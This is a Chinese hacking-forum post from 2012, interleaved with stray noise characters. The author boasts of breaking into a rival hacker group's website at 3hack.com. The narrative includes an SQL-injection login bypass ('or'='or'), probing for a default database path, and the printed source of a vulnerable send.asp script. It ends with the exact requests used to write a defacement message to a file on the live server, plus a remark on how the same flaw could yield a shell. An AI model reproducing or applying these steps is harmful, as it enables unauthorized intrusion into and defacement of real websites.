|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量0 Q+ t, r% _. \+ o$ I0 _
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
- T2 M+ h9 ~5 E% _% A+ ~: k) i ~这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来: H) f, r) F0 n4 N
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
; d4 C2 Y, O& Q/ R" l首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
6 F. K6 @& X: a; h: V服务器应该防ARP,不过这还只是猜测
2 B. D5 R; K3 j* ~) G; O8 T云中鸡说先不搞C段,PZ一下再说
; a# j- q! J5 b& C _+ c然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]
2 b1 M- ^" X( v* }一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕............... H- D/ _) r3 |2 P `% p
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell& f$ k% G9 c: W; v; Q* q
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT3 R' U6 z {& A* H; Z1 H% D
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
5 i( A- S9 C% M0 }2 V. E9 H8 p( l% R看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
! Z3 D' I5 }6 z' z# k问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
2 d% A8 v* C! C, w2 |) u无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~. e- R$ E- ]2 q$ c& `- [7 l
然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么
3 l A, s+ @ X: b打开一看,如图1所示。4 P# P! G' _7 S* ^, m R E% [- H+ P* n2 P# g
: R' \6 d' g! C+ g http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg4 ~4 a* h5 ?) X
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
( U2 n5 v& h8 Y" b/ V: W+ s% {/ R: z0 Y: U
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg5 v* d4 V- Q# d
太帅了,真YD!!
$ C) Y. ?% p# r: ?% F: {这个页面应该是一套个人主页程序,而且还挺炫的!6 {2 ~ [5 [- ^; Q$ ]
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。- T6 f& K) H! P! s* Z! Z8 E! D% q
$ s) h+ I7 s7 V- ?6 ~' P
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg3 E, C% y7 K8 z7 A7 h& {1 S1 U
嘿嘿,试着'or'='or'居然进去了!!如图4所示。) m$ C7 D! S1 j1 Z
; u$ g; k7 Y$ d9 F+ V. | http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
% W0 u+ | V* ]7 m0 C' u; o3 J! \经过半个多小时的摸索,还是没有发现可利用的地方。1 _3 E3 h$ i9 R0 K# j/ }2 Q$ ~% A
这下郁闷了,不管了,把这套程序下载下来看看吧
: O3 ]1 E6 Q2 Z( S找了一会才知道这套程序叫做“V时代个人flash主页”; v9 o$ K! _7 t l7 M$ o3 ^# H
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
- i S0 A5 Z0 a7 C% t9 y于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]& k& o- Y- h6 D$ v
返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]
$ J0 V. a3 J: G2 B# I& [同样是找不到页面,真晕!再看看!3 h% a* Z$ d- m5 {7 `
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!* K' J% K: R# p. u. A
马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!$ e/ n& S+ X! `5 N( f1 ~: U
打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!% T% [* X k% j2 H- `$ @
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:
& ^2 }- \0 q8 a% \- Z. O3 V; W# K
var a
. Z3 Z. _* ] ^* \var b/ e8 F- K% K5 q# A* }8 l+ y% H
var tx# Z/ C% U, O' [8 B$ k
var clean) h, N9 ?/ N. f9 o- j
a=Request("re")
: K7 n9 E2 B5 `4 W( z. \/ ~, Yclean=Request("clean")
: K/ y6 D) u7 {5 @& n/ zvar jian="test.txt"
# W4 H. f% n: N5 B9 }7 @% d/ {" a' Q$ x' J7 |, z
if(clean==1){
# e( k9 d. r; T; Btx="&a="
3 `6 u* n. d) Bvar fs2
8 n% P: j, Y1 {7 H2 svar fs2=Server.CreateObject("Scripting.FileSystemObject")
: l1 f1 o, y l) Y! p2 B% gvar newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)4 a) M) s1 p, M- d& Y; l @
newdt.WriteLine("&a=")
& N8 s$ u8 v6 D; |newdt.close()
% r4 n$ D4 B `5 j; T}& I1 o0 Y0 a; c7 l/ C* h# d& q
& ~3 n; C6 l" i1 @# a
if(clean==0|clean==1){: r6 U9 S: h% @
tx="") y/ w' Q' K9 _% A2 {$ Z
var fso = Server.Createobject("Scripting.FileSystemObject")" y% j2 Q: e- u9 u
var file = fso.OpenTextFile(Server.Mappath(jian))2 R, A6 u: h; G$ U( |! f
while (!file.AtEndOfStream){
% V" U4 m' H0 C- u4 I7 |tx=file.ReadLine()
" }, m* w, p! y0 QResponse.write (tx)
6 }* B: P _/ i- ^+ f! V _}: K/ [$ H: @; c: D0 t
Response.write ("&")0 R* Z' Z- Y+ Y7 X0 W+ \
file.close()
9 i/ Z3 h' J. y}
+ b* A; ^. x2 N/ Y+ W9 r- d" |: N. v
- B& Y8 k3 j0 ~/ h8 h6 a4 Jif(clean==2){
# W. U" v- k( D7 B9 Btx=""# i9 W7 a1 F( p& Y0 ]2 Q
var fso = Server.Createobject("Scripting.FileSystemObject")
4 u1 P1 _' e$ ]4 W1 nvar file = fso.OpenTextFile(Server.Mappath(jian))
2 ]2 g) _* j( d1 X4 [' r- r! \" J1 K8 }5 N. o
var fs2$ s% R! e$ T% K, \, ?* l- L( }
var fs2=Server.CreateObject("Scripting.FileSystemObject")
?+ p# e/ e3 \; V' q: fvar newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)
& d) d* y) y) ?+ y @$ R
* v% ^$ n# s( M% b" i$ a; N# b, b, w
while (!file.AtEndOfStream){
! p( Z9 J' c8 N/ X' Dtx=file.ReadLine(): h# g0 I* Z, J* E2 y8 t' u
Response.write (tx)}
9 C6 B3 x% o. @7 ^; y4 a8 j0 C- V8 Y- l
Response.write (a+"&")3 ?3 w: K" t: E2 ^- F. s
newdt.WriteLine(a); ^: h) F3 { H, q9 p, r
' T' |6 p( h. Y8 S6 X8 ^$ [file.close()
# j* b$ `1 P: J: n7 {newdt.close()
* v+ o; R. u, r' b p# b}
. }/ x. A) k5 @: A3 n, A
- @- z: Y/ I# n( r
5 S- E. i% T {复制代码$ E6 ^+ M: w# f) @- f
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”# J' e$ C0 m) o6 W! X: T
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
$ W, M2 `% `9 ^这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
0 Q h: y t$ r+ p# L过程如图5、6所示。9 O8 l9 S# v% F
# A! {: Z1 k bhttp://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg( W" V+ n. i( i7 i, u! p# q
) o# [2 w/ w1 G; L1 ~9 ?7 h3 G http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
3 C0 m/ S; _# s( Q+ G# y提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
9 i6 j& Q2 ]) b' G+ ^6 G! z: D3 N, v' B, V
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
2 h' _, a( p: Y) T- A! O. R j4 n这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的# C4 s/ z; Z; E( k
如果jian是经过request取值的话,同样也能搞到shell。
0 G# B$ W" ?6 `. O+ O1 I这次只是装到了X,并没有拿到shell s" q4 H+ v1 ]+ \0 F* z S9 M
已经是凌晨了,跟云中J说了声就睡觉去鸟
! L" e; k$ b4 o+ w估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
; A$ w5 z& X7 y% g; S. `& U就到这里吧,没技术含量,纯粹装X,高手们见笑了
& e+ l) p; o4 P6 m/ K4 @+ k另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
; ?0 w3 g' N/ v X) C自己学不到技术,却还在自欺欺人! A" X8 k q. w4 x- `, {5 H$ @' v
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
& ^1 `+ L B8 _7 ~( L# ~
3 p6 D- B5 Y: Y# P# Q |
|
发表于 2012-11-6 21:06:10
收藏
支持
反对